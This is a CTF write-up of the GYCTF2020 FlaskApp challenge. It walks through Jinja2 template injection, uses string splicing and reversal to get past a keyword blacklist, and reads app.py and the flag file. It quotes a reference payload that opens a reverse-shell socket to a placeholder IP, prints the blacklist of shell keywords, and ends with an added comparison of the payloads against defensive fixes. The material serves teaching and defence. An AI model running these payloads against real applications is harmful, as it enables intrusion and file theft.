[GYCTF2020]FlaskApp
2022-07-26 14:07:00 【Strange Xiaosheng lost his mind】
Points tested
Flask SSTI (template injection)
SSTI blacklist bypass
PIN code generation
Information gathering
The page offers encryption, decryption, and a Hint that only tells us to try hard (which does not seem to help).
Decrypting some random input throws an error page, which shows that debug mode is on.
That error page exposes part of the source code:

Roughly: the text parameter is run through a waf, and anything that gets past it is executed.
Encrypting and then decrypting {{6+6}} returns 12, which confirms SSTI.

Reference knowledge
In Jinja2, control structures use {% %} and variable output uses {{ }}.
Python magic methods and attributes:
__class__ returns the type of the object it is called on
__bases__ returns the list of base classes
__mro__ the tuple of classes searched, in order, when a method is resolved
__subclasses__() returns the list of subclasses
__globals__ returns the global namespace of the function (equivalent to func_globals)
__builtins__ a reference to the built-in module, visible everywhere (including globals) and loaded automatically by every Python script; it holds many powerful built-in functions such as eval, exec, open, etc.
Walkthrough
First read the complete app.py, which makes bypassing the waf much easier.
Reference payload from Templates Injections:
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}
{%endif%}{% endfor %}
Changed to:
{% for x in [].__class__.__base__.__subclasses__() %}
{% if x.__name__=='catch_warnings' %}
{{ x.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{% endif %}{% endfor %}
Collapsed to one line:
{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('app.py').read() }}{% endif %}{% endfor %}
This dumps a lump of source. The waf:
def waf(str):
    black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]
    for x in black_list :
        if x in str.lower() : return 1   # return value reconstructed; this line was mangled in the extraction
# the source continues with the route handler:
# @app.route('/hint',methods=['GET'])
So the waf knows a set of keywords and lowercases the input before checking: lower()-based tricks and base64/hex encodings are out, but string concatenation still gets past it. Use the listdir method to look at the directory:
{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
This returns:
['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']
We can see this_is_the_flag.txt, so splice the name into open and read it:
{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt').read()}}{% endif %}{% endfor %}
Got it:

Reversed-string bypass
'txt.galf_eht_si_siht/'[::-1] reverses the string at render time,
which evaluates to /this_is_the_flag.txt, so the blacklisted word "flag" never appears in the payload:
{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1]).read()}}{% endif %}{% endfor %}
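Added example, not from the write-up or the challenge code: it runs the challenge's blacklist over the direct, spliced and reversed payloads from the two sections above to show why substring matching cannot catch the splices, and beside it shows the two fixes a defender would apply, rendering user text as a template variable instead of as template source, and the Jinja2 sandbox, which refuses underscore attributes. The payload strings are constructed here; jinja2 is needed only for the fix functions.

```python
# Added example, not part of the original write-up: the challenge's blacklist
# checked against the write-up's payloads, beside how the endpoint should render.
try:
    import jinja2                                   # optional: only the fixes need it
    from jinja2.sandbox import SandboxedEnvironment
    from jinja2.exceptions import SecurityError
except ImportError:                                 # blacklist checks still run without it
    jinja2 = None

BLACK_LIST = ["flag", "os", "system", "popen", "import", "eval", "chr", "request",
              "subprocess", "commands", "socket", "hex", "base64", "*", "?"]

def waf(text):
    """The challenge's check: True (blocked) if any keyword appears, case-insensitively."""
    low = text.lower()
    return any(word in low for word in BLACK_LIST)

# Constructed here: the same gadget chain written three ways, as in the write-up.
PREFIX = ("{% for x in [].__class__.__base__.__subclasses__() %}"
          "{% if x.__name__=='catch_warnings' %}")
SUFFIX = "{% endif %}{% endfor %}"
DIRECT = PREFIX + "{{ x.__init__.__globals__['__builtins__']['__import__']('os').listdir('/') }}" + SUFFIX
SPLIT = PREFIX + "{{ x.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/') }}" + SUFFIX
REVERSED = PREFIX + "{{ x.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1]).read() }}" + SUFFIX

def blacklist_results():
    """Which payloads the blacklist stops; the spliced forms contain no listed substring."""
    return {"direct": waf(DIRECT), "split": waf(SPLIT), "reversed": waf(REVERSED)}

def render_as_template(user_text):
    """The vulnerable pattern: user text becomes template source, so {{6+6}} yields '12'."""
    if jinja2 is None:
        return None
    return jinja2.Environment().from_string(user_text).render()

def render_as_data(user_text):
    """Fix 1: the template is fixed and user text is only a variable, so {{6+6}} stays literal."""
    if jinja2 is None:
        return None
    return jinja2.Environment(autoescape=True).from_string("{{ text }}").render(text=user_text)

def render_sandboxed(user_text):
    """Fix 2 (defence in depth): the sandbox refuses attributes starting with '_',
    so the __class__/__base__/__subclasses__ chain raises SecurityError."""
    if jinja2 is None:
        return None
    try:
        return SandboxedEnvironment().from_string(user_text).render()
    except SecurityError:
        return "blocked"
```

The blacklist stops only the direct form; the fixes stop all three because they never let user text reach the template parser with that power.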
RCE via the PIN code
I haven't done this one yet; leaving it for now. There is a small problem in calculating the PIN.
OK, that's it.
